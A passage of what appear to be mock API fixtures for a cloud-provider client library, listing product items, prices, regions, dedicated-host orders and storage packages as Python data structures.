'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'}, 'prices': [{'id': 8888, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 44400, 'keyName': 'KeyName0155', 'capacity': '4', 'description': '4 Portable Private IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'}, 'prices': [{'id': 44441, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 88800, 'keyName': 'KeyName0144', 'capacity': '8', 'description': '8 Portable Private IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'}, 'prices': [{'id': 88881, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}], }, { 'id': 10, 'keyName': 'KeyName0341', 'capacity': '0', 'description': 'Global IPv4', 'itemCategory': {'categoryCode': 'global_ipv4'}, 'prices': [{'id': 11, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}], }, { 'id': 66464, 'keyName': '1_IPV6_ADDRESS', 'capacity': '64', 'description': '/64 Block Portable Public IPv6 Addresses', 'itemCategory': {'categoryCode': 'static_ipv6_addresses'}, 'prices': [{'id': 664641, 'hourlyRecurringFee': '0', 'locationGroupId': '', 'recurringFee': '0'}], }, { 'id': 610, 'keyName': 'KeyName031', 'capacity': '0', 'description': 'Global IPv6', 'itemCategory': {'categoryCode': 'global_ipv6'}, 'prices': [{'id': 611, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, {'attributes': [], 'capacity': '0', 'description': '0 GB Bandwidth', 'itemCategory': {'categoryCode': 'bandwidth', 'id': 10}, 'keyName': 'BANDWIDTH_0_GB_2', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 1800, "locationGroupId": '', 'itemId': 439, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'setupFee': '0', 'sort': 99}]}, {'attributes': [], 'capacity': '10', 'description': '10 Mbps Public & Private Network Uplinks', 'itemCategory': {'categoryCode': 'port_speed', 'id': 26}, 'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 272, "locationGroupId": '', 'itemId': 186, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 5}]}, {'attributes': [], 'capacity': '0', 'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)', 'itemCategory': {'categoryCode': 'os', 'id': 12}, 'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0.10', 'id': 37650, "locationGroupId": '', 'itemId': 4702, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0.1', 'setupFee': '0.1', 'sort': 9}], 'softwareDescription': {'id': 1362, 'longDescription': 'Ubuntu / 14.04-64', 'referenceCode': 'UBUNTU_14_64'}} ] getItemPricesISCSI = [ { 'currentPriceFlag': '', 'id': 2152, 'item': { 'capacity': '1', 'description': '1 GB iSCSI SAN Storage', 'id': 1111, 'softwareDescriptionId': '', 'units': 'GB', 'upgradeItemId': 547}, 'itemId': 1111, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'packageReferences': [{'id': 46626, 'itemPriceId': 2152, 'packageId': 0}], 'quantity': '', 'recurringFee': '.35', 'setupFee': '0', 'sort': 0 }, { 'currentPriceFlag': '', 'id': 22501, 'item': {'capacity': '1', 'description': '1 GB iSCSI SAN Storage', 'id': 1111, 'softwareDescriptionId': '', 'units': 'GB', 'upgradeItemId': 547}, 'itemId': 1111, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'packageReferences': [{ 'id': 252983, 'itemPriceId': 22501, 'packageId': 0 }], 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0 }, { 'currentPriceFlag': '', 'id': 22441, 'item': { 'capacity': '1', 'description': '1 GB iSCSI SAN Storage', 'id': 1111, 'softwareDescriptionId': '', 'units': 'GB', 'upgradeItemId': 547 }, 'itemId': 1111, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'packageReferences': [{'id': 250326, 'itemPriceId': 22441, 'packageId': 0}], 'quantity': '', 'recurringFee': '15', 'setupFee': '0', 'sort': 0 }] getItemsVS = [ { 'id': 1234, 'keyName': 'KeyName01', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'softwareDescription': { 'id': 1228, 'longDescription': 'Redhat EL 5.10-64', 'referenceCode': 'REDHAT_5_64' }, 'prices': [{'id': 1122, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 2233, 'keyName': 'KeyName02', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'prices': [{'id': 4477, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 1239, 'keyName': 'KeyName03', 'capacity': '2', 'description': 'RAM', 'itemCategory': {'categoryCode': 'RAM'}, 'prices': [{'id': 1133, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 3, 'name': 'RAM', 'categoryCode': 'ram'}]}], } ] verifyOrderDH = { 'preTaxSetup': '0', 'storageGroups': [], 'postTaxRecurring': '3.164', 'billingOrderItemId': '', 'presetId': '', 'hardware': [ { 'domain': 't.com', 'hostname': 't', 'bareMetalInstanceFlag': '', 'hardwareStatusId': '', 'primaryBackendNetworkComponent': { 'router': { 'id': 51218 }, 'networkVlanId': '' }, 'accountId': '' } ], 'prices': [ { 'itemId': 10195, 'setupFee': '0', 'recurringFee': '0', 'hourlyRecurringFee': '3.164', 'oneTimeFee': '0', 'id': 200269, 'item': { 'thirdPartyPolicyAssignments': [], 'capacity': '56', 'description': '56 Cores X 242 RAM X 1.2 TB', 'bundle': [ { 'category': { 'categoryCode': 'dedicated_host_ram', 'id': 850, 'name': 'Dedicated Host RAM' }, 'itemPriceId': 200301, 'itemPrice': { 'itemId': 10199, 'setupFee': '0', 'recurringFee': '0', 'hourlyRecurringFee': '0', 'oneTimeFee': '0', 'id': 200301, 'laborFee': '0' }, 'bundleItemId': 10195, 'bundleItem': { 'units': 'CORE', 'keyName': '56_CORES_X_242_RAM_X_1_4_TB', 'capacity': '56', 'description': '56 Cores X 242 RAM X 1.2 TB', 'id': 10195 }, 'id': 41763 }, { 'category': { 'categoryCode': 'dedicated_host_disk', 'id': 851, 'name': 'Dedicated Host Disk' }, 'itemPriceId': 200299, 'itemPrice': { 'itemId': 10197, 'setupFee': '0', 'recurringFee': '0', 'hourlyRecurringFee': '0', 'oneTimeFee': '0', 'id': 200299, 'laborFee': '0' }, 'bundleItemId': 10195, 'bundleItem': { 'units': 'CORE', 'keyName': '56_CORES_X_242_RAM_X_1_4_TB', 'capacity': '56', 'description': '56 Cores X 242 RAM X 1.2 TB', 'id': 10195 }, 'id': 41761 } ], 'keyName': '56_CORES_X_242_RAM_X_1_4_TB', 'units': 'CORE', 'id': 10195 }, 'laborFee': '0', 'categories': [ { 'categoryCode': 'dedicated_virtual_hosts', 'id': 848, 'name': 'Dedicated Host' } ] } ], 'sendQuoteEmailFlag': '', 'packageId': 813, 'useHourlyPricing': True, 'preTaxRecurringMonthly': '0', 'message': '', 'preTaxRecurring': '3.164', 'primaryDiskPartitionId': '', 'locationObject': { 'id': 138124, 'name': 'dal05', 'longName': 'Dallas 5' }, 'taxCompletedFlag': False, 'isManagedOrder': '', 'imageTemplateId': '', 'postTaxRecurringMonthly': '0', 'resourceGroupTemplateId': '', 'postTaxSetup': '0', 'sshKeys': [], 'location': '138124', 'stepId': '', 'proratedInitialCharge': '0', 'totalRecurringTax': '0', 'paymentType': '', 'resourceGroupId': '', 'sourceVirtualGuestId': '', 'bigDataOrderFlag': False, 'extendedHardwareTesting': '', 'preTaxRecurringHourly': '3.164', 'postTaxRecurringHourly': '3.164', 'currencyShortName': 'USD', 'containerSplHash': '000000003699c54000007f38ef8b0102', 'proratedOrderTotal': '0', 'serverCoreCount': '', 'privateCloudOrderFlag': False, 'totalSetupTax': '0', 'quantity': 1 } itemsLoadbal = [ { "capacity": "0", "description": "Load Balancer as a Service", "id": 10043, "keyName": "LOAD_BALANCER_AS_A_SERVICE", "itemCategory": { "categoryCode": "load_balancer_as_a_service", "id": 1116, "name": "Load Balancer As A Service", }, "prices": [ { "hourlyRecurringFee": "0", "id": 199447, "locationGroupId": '', "recurringFee": "0", } ] }, { "capacity": "0", "description": "Load Balancer Uptime", "id": 10785, "keyName": "LOAD_BALANCER_UPTIME", "itemCategory": { "categoryCode": "load_balancer_uptime", "id": 1119, "name": "Load Balancer Uptime", }, "prices": [ { "hourlyRecurringFee": ".028", "id": 205913, "locationGroupId": 507, }]} ] regionsLoadbal = [{'description': 'WDC01 - Washington, DC - East Coast U.S.', 'keyname': 'WASHINGTON_DC', 'location': {'location': {'id': 37473, 'longName': 'Washington 1', 'name': 'wdc01', "groups": [ { "description": "Location Group 4", "id": 507, "locationGroupTypeId": 82, "name": "Location Group 4", "locationGroupType": { "name": "PRICING" } }, { "description": "COS Cross Region - EU", "id": 1303, "locationGroupTypeId": 82, "name": "eu", "locationGroupType": { "name": "PRICING" } }, { "description": "COS Regional Frankfurt", "id": 1783, "locationGroupTypeId": 82, "name": "eu-de", "locationGroupType": { "name": "PRICING" } } ] }}, 'sortOrder': 10}] getAllObjectsLoadbal = [ { "id": 805, "keyName": "LBAAS", "name": "Load Balancer As A Service (LBaaS)", "items": itemsLoadbal, "regions": regionsLoadbal } ] getAllObjectsDH = [{ "subDescription": "Dedicated Host", "name": "Dedicated Host", "items": [{ "capacity": "56", "description": "56 Cores X 242 RAM X 1.2 TB", "bundleItems": [ { "capacity": "1200", "keyName": "1_4_TB_LOCAL_STORAGE_DEDICATED_HOST_CAPACITY", "categories": [{ "categoryCode": "dedicated_host_disk" }] }, { "capacity": "242", "keyName": "242_GB_RAM", "categories": [{ "categoryCode": "dedicated_host_ram" }] } ], "prices": [ { "itemId": 10195, "setupFee": "0", "recurringFee": "2099", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.164", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200269, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": "", "quantity": "" }, { "itemId": 10195, "setupFee": "0", "recurringFee": "2161.97", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.258", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200271, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": 503, "quantity": "" } ], "keyName": "56_CORES_X_242_RAM_X_1_4_TB", "id": 10195, "itemCategory": { "categoryCode": "dedicated_virtual_hosts" } }], "keyName": "DEDICATED_HOST", "unitSize": "", "regions": [{ "location": { "locationPackageDetails": [{ "isAvailable": 1, "locationId": 138124, "packageId": 813 }], "location": { "statusId": 2, "priceGroups": [{ "locationGroupTypeId": 82, "description": "CDN - North America - Akamai", "locationGroupType": { "name": "PRICING" }, "securityLevelId": "", "id": 1463, "name": "NORTH-AMERICA-AKAMAI" }], "id": 138124, "name": "dal05", "longName": "Dallas 5" } }, "keyname": "DALLAS05", "description": "DAL05 - Dallas", "sortOrder": 12 }], "firstOrderStepId": "", "id": 813, "isActive": 1, "description": "Dedicated Host" }] getAllObjectsDHGpu = [{ "subDescription": "Dedicated Host", "name": "Dedicated Host", "items": [{ "capacity": "56", "description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]", "bundleItems": [ { "capacity": "1200", "keyName": "1.2 TB Local Storage (Dedicated Host Capacity)", "categories": [{ "categoryCode": "dedicated_host_disk" }] }, { "capacity": "242", "keyName": "2_GPU_P100_DEDICATED", "hardwareGenericComponentModel": { "capacity": "16", "id": 849, "hardwareComponentType": { "id": 20, "keyName": "GPU" } }, "categories": [{ "categoryCode": "dedicated_host_ram" }] } ], "prices": [ { "itemId": 10195, "setupFee": "0", "recurringFee": "2099", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.164", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200269, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": "", "quantity": "" }, { "itemId": 10195, "setupFee": "0", "recurringFee": "2161.97", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.258", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200271, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": 503, "quantity": "" } ], "keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100", "id": 10195, "itemCategory": { "categoryCode": "dedicated_virtual_hosts" } }], "keyName": "DEDICATED_HOST", "unitSize": "", "regions": [{ "location": { "locationPackageDetails": [{ "isAvailable": 1, "locationId": 138124, "packageId": 813 }], "location": { "statusId": 2, "priceGroups": [{ "locationGroupTypeId": 82, "description": "CDN - North America - Akamai", "locationGroupType": { "name": "PRICING" }, "securityLevelId": "", "id": 1463, "name": "NORTH-AMERICA-AKAMAI" }], "id": 138124, "name": "dal05", "longName": "Dallas 5" } }, "keyname": "DALLAS05", "description": "DAL05 - Dallas", "sortOrder": 12 }], "firstOrderStepId": "", "id": 813, "isActive": 1, "description": "Dedicated Host" }] getRegions = [{ "description": "WDC07 - Washington, DC", "keyname": "WASHINGTON07", "location": { "locationId": 2017603, "location": { "id": 2017603, "longName": "Washington 7", "name": "wdc07", "priceGroups": [ { "description": "COS Regional - US East", "id": 1305, "locationGroupTypeId": 82, "name": "us-east", "locationGroupType": { "name": "PRICING" } } ] } }, "locations": [{ "location": { "euCompliantFlag": False, "id": 2017603, "longName": "Washington 7", "name": "wdc07", "statusId": 2}, "locationPackageDetails": [{ "isAvailable": 1, "locationId": 2017603, "packageId": 46 }] }] }] getItemPrices = [ { "hourlyRecurringFee": ".093", "id": 204015, "recurringFee": "62", "categories": [ { "categoryCode": "guest_core" } ], "item": { "description": "4 x 2.0 GHz or higher Cores", "id": 859, "keyName": "GUEST_CORES_4", }, "pricingLocationGroup": { "id": 503, "locations": [ { "id": 449610, "longName": "Montreal 1", "name": "mon01", "statusId": 2, "regions": [ { "description": "MON01 - Montreal", "keyname": "MONTREAL", "sortOrder": 94 } ] }, { "id": 449618, "longName": "Montreal 2", "name": "mon02", "statusId": 2 }, { "id": 448994, "longName": "Toronto 1", "name": "tor01", "statusId": 2 }, { "id": 350993, "longName": "Toronto 2", "name": "tor02", "statusId": 2 }, { "id": 221894, "longName": "Amsterdam 2", "name": "ams02", "statusId": 2, "regions": [ { "description": "AMS02 POP - Amsterdam", "keyname": "AMSTERDAM02", "sortOrder": 12 } ] }, { "id": 265592, "longName": "Amsterdam 1", "name": "ams01", "statusId": 2 }, { "id": 814994, "longName": "Amsterdam 3", "name": "ams03", "statusId": 2 } ] } }, { "hourlyRecurringFee": ".006", "id": 204663, "recurringFee": "4.1", "item": { "description": "100 GB (LOCAL)", "id": 3899, "keyName": "GUEST_DISK_100_GB_LOCAL_3", }, "pricingLocationGroup": { "id": 503, "locations": [ { "id": 449610, "longName": "Montreal 1", "name": "mon01", "statusId": 2 }, { "id": 449618, "longName": "Montreal 2", "name": "mon02", "statusId": 2 }, { "id": 448994, "longName": "Toronto 1", "name": "tor01", "statusId": 2 }, { "id": 350993, "longName": "Toronto 2", "name": "tor02", "statusId": 2 }, { "id": 221894, "longName": "Amsterdam 2", "name": "ams02", "statusId": 2 }, { "id": 265592, "longName": "Amsterdam 1", "name": "ams01", "statusId": 2 }, { "id": 814994, "longName": "Amsterdam 3", "name": "ams03", "statusId": 2 } ] } }, { "hourlyRecurringFee": ".217", "id": 204255, "recurringFee": "144", "item": { "description": "16 GB ", "id": 1017, "keyName": "RAM_16_GB", }, "pricingLocationGroup": { "id": 503, "locations": [ { "id": 449610, "longName": "Montreal 1", "name": "mon01", "statusId": 2 }, { "id": 449618, "longName": "Montreal 2", "name": "mon02", "statusId": 2 }, { "id": 448994, "longName": "Toronto 1", "name": "tor01", "statusId": 2 }, { "id": 350993, "longName": "Toronto 2", "name": "tor02", "statusId": 2 }, { "id": 221894, "longName": "Amsterdam 2", "name": "ams02", "statusId": 2 }, { "id": 265592, "longName": "Amsterdam 1", "name": "ams01", "statusId": 2 }, { "id": 814994, "longName": "Amsterdam 3", "name": "ams03", "statusId": 2 } ] } } ] getActivePresets = [ { "description": "M1.64x512x25", "id": 799, "isActive": "1", "keyName": "M1_64X512X25", "name": "M1.64x512x25", "packageId": 835 }, { "description": "M1.56x448x100", "id": 797, "isActive": "1", "keyName": "M1_56X448X100", "name": "M1.56x448x100", "packageId": 835 }, { "description": "M1.64x512x100", "id": 801, "isActive": "1", "keyName": "M1_64X512X100", "name": "M1.64x512x100", "packageId": 835 } ] getAccountRestrictedActivePresets = [] RESERVED_CAPACITY = [{"id": 1059}] getItems_RESERVED_CAPACITY = [ { 'id': 12273, 'keyName': 'B1_1X2_1_YEAR_TERM', 'description': 'B1 1x2 1 year term', 'capacity': 12, 'itemCategory': { 'categoryCode': 'reserved_capacity', 'id': 2060, 'name': 'Reserved Capacity', 'quantityLimit': 20, 'sortOrder': '' }, 'prices': [ { 'currentPriceFlag': '', 'hourlyRecurringFee': '.032', 'id': 217561, 'itemId': 12273, 'laborFee': '0', 'locationGroupId': '', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'setupFee': '0', 'sort': 0, 'tierMinimumThreshold': '', 'categories': [ { 'categoryCode': 'reserved_capacity', 'id': 2060, 'name': 'Reserved Capacity', 'quantityLimit': 20, 'sortOrder': '' } ] } ] } ] getItems_1_IPV6_ADDRESS = [ { 'id': 4097, 'keyName': '1_IPV6_ADDRESS', 'itemCategory': { 'categoryCode': 'pri_ipv6_addresses', 'id': 325, 'name': 'Primary IPv6 Addresses', 'quantityLimit': 0, 'sortOrder': 34 }, 'prices': [ { 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 17129, 'itemId': 4097, 'laborFee': '0', 'locationGroupId': '', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0, 'tierMinimumThreshold': '', 'categories': [ { 'categoryCode': 'pri_ipv6_addresses', 'id': 325, 'name': 'Primary IPv6 Addresses', 'quantityLimit': 0, 'sortOrder': 34 } ] } ] } ] getObject = { 'id': 200, 'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.', 'keyname': 'WASHINGTON_DC', 'location': {'location': {'id': 37473, 'longName': 'Washington 1', 'name': 'wdc01'}}, 'sortOrder': 10}], 'accountRestrictedActivePresets': [], 'activePresets': [ { 'description': 'AC2.8x60x25', 'id': 861, 'isActive': '1', 'keyName': 'AC2_8X60X25', 'name': 'AC2.8x60x25', 'packageId': 835 }, { 'description': 'AC2.8x60x100', 'id': 863, 'isActive': '1', 'keyName': 'AC2_8X60X100', 'name': 'AC2.8x60x100', 'packageId': 835 }], "items": [{ "capacity": "56", "description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]", "bundleItems": [ { "capacity": "1200", "keyName": "1.2 TB Local Storage (Dedicated Host Capacity)", "categories": [{ "categoryCode": "dedicated_host_disk" }] }, { "capacity": "242", "keyName": "2_GPU_P100_DEDICATED", "hardwareGenericComponentModel": { "capacity": "16", "id": 849, "hardwareComponentType": { "id": 20, "keyName": "GPU" } }, "categories": [{ "categoryCode": "dedicated_host_ram" }, { "capacity": "2", "description": "2 x 2.0 GHz or higher Cores", "keyName": "GUEST_CORES_2", "attributes": [ { "id": 8261, "attributeTypeKeyName": "ORDER_SAVES_USAGE_FEES" } ], "itemCategory": { "categoryCode": "guest_core", "id": 80 }}] } ], "prices": [ { "itemId": 10195, "setupFee": "0", "recurringFee": "2099", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.164", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200269, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": "", "quantity": "" }, { "itemId": 10195, "setupFee": "0", "recurringFee": "2161.97", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.258", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200271, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": 503, "quantity": "" } ], "keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100", "id": 10195, "itemCategory": { "categoryCode": "dedicated_virtual_hosts" } }]}
33.444606
106
0.375074
HARDWARE_ITEMS = [ {'attributes': [], 'capacity': '999', 'description': 'Unknown', 'itemCategory': {'categoryCode': 'unknown', 'id': 325}, 'keyName': 'UNKNOWN', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 1245172, "locationGroupId": '', 'itemId': 935954, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'capacity': '64', 'description': '1 IPv6 Address', 'itemCategory': {'categoryCode': 'pri_ipv6_addresses', 'id': 325}, 'keyName': '1_IPV6_ADDRESS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 17129, "locationGroupId": '', 'itemId': 4097, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'capacity': '10', 'description': '10 Mbps Public & Private Network Uplinks', 'itemCategory': {'categoryCode': 'port_speed', 'id': 26}, 'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 272, "locationGroupId": '', 'itemId': 186, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 5}]}, {'attributes': [], 'capacity': '0', 'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)', 'itemCategory': {'categoryCode': 'os', 'id': 12}, 'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 37650, "locationGroupId": '', 'itemId': 4702, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 9}], 'softwareDescription': {'id': 1362, 'longDescription': 'Ubuntu / 14.04-64', 'referenceCode': 'UBUNTU_14_64'}}, {'attributes': [], 'capacity': '1', 'description': '1 IP Address', 'itemCategory': {'categoryCode': 'pri_ip_addresses', 'id': 13}, 'keyName': '1_IP_ADDRESS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 21, "locationGroupId": '', 'itemId': 15, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [{'attributeTypeKeyName': 'RECLAIM_BYPASS', 'id': 1014}], 'description': 'Unlimited SSL VPN Users', 'itemCategory': {'categoryCode': 'vpn_management', 'id': 31}, 'keyName': 'SSL_VPN_USERS_1_PPTP_VPN_USER_PER_ACCOUNT', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 420, "locationGroupId": '', 'itemId': 309, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'description': 'Reboot / KVM over IP', 'itemCategory': {'categoryCode': 'remote_management', 'id': 46}, 'keyName': 'REBOOT_KVM_OVER_IP', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 906, "locationGroupId": '', 'itemId': 504, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'capacity': '0', 'description': '0 GB Bandwidth', 'itemCategory': {'categoryCode': 'bandwidth', 'id': 10}, 'keyName': 'BANDWIDTH_0_GB', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'id': 22505, "locationGroupId": '', 'itemId': 4481, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 98}]}, {'attributes': [], 'capacity': '0', 'description': '0 GB Bandwidth', 'itemCategory': {'categoryCode': 'bandwidth', 'id': 10}, 'keyName': 'BANDWIDTH_0_GB_2', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 1800, "locationGroupId": '', 'itemId': 439, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'setupFee': '0', 'sort': 99}]}] ENTERPRISE_PACKAGE = { 'categories': [ {'categoryCode': 'storage_service_enterprise'} ], 'id': 240, 'name': 'Endurance', 'items': [ { 'capacity': '0', 'itemCategory': {'categoryCode': 'storage_service_enterprise'}, 'keyName': 'CODENAME_PRIME_STORAGE_SERVICE', 'prices': [ { 'categories': [ {'categoryCode': 'storage_service_enterprise'} ], 'id': 45058, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': {'categoryCode': 'storage_file'}, 'keyName': 'FILE_STORAGE_2', 'prices': [ { 'categories': [ {'categoryCode': 'storage_file'} ], 'id': 45108, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': {'categoryCode': 'storage_block'}, 'keyName': 'BLOCK_STORAGE_2', 'prices': [ { 'categories': [ {'categoryCode': 'storage_block'} ], 'id': 45098, 'locationGroupId': '' } ] }, { 'capacity': '10', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '10_GB_STORAGE_SPACE', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 46160, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 46170, 'locationGroupId': '' } ] }, { 'capacity': '20', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 45860, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 46659, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 45128, 'locationGroupId': '' } ] }, { 'capacity': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 46789, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 45318, 'locationGroupId': '' } ] }, { 'attributes': [ {'value': '300'} ], 'capacity': '300', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': 'WRITEHEAVY_TIER', 'prices': [ { 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'id': 45088, 'locationGroupId': '' } ] }, { 'attributes': [ {'value': '200'} ], 'capacity': '200', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': 'READHEAVY_TIER', 'prices': [ { 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'id': 45078, 'locationGroupId': '' } ] } ] } PERFORMANCE_PACKAGE = { 'categories': [ {'categoryCode': 'performance_storage_iscsi'}, {'categoryCode': 'performance_storage_nfs'} ], 'id': 222, 'name': 'Performance', 'items': [ { 'capacity': '0', 'itemCategory': {'categoryCode': 'performance_storage_iscsi'}, 'keyName': 'BLOCK_STORAGE_PERFORMANCE_ISCSI', 'prices': [ { 'categories': [ {'categoryCode': 'performance_storage_iscsi'} ], 'id': 40672, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': {'categoryCode': 'performance_storage_nfs'}, 'keyName': 'FILE_STORAGE_PERFORMANCE_NFS', 'prices': [ { 'categories': [ {'categoryCode': 'performance_storage_nfs'} ], 'id': 40662, 'locationGroupId': '' } ] }, { 'capacity': '20', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 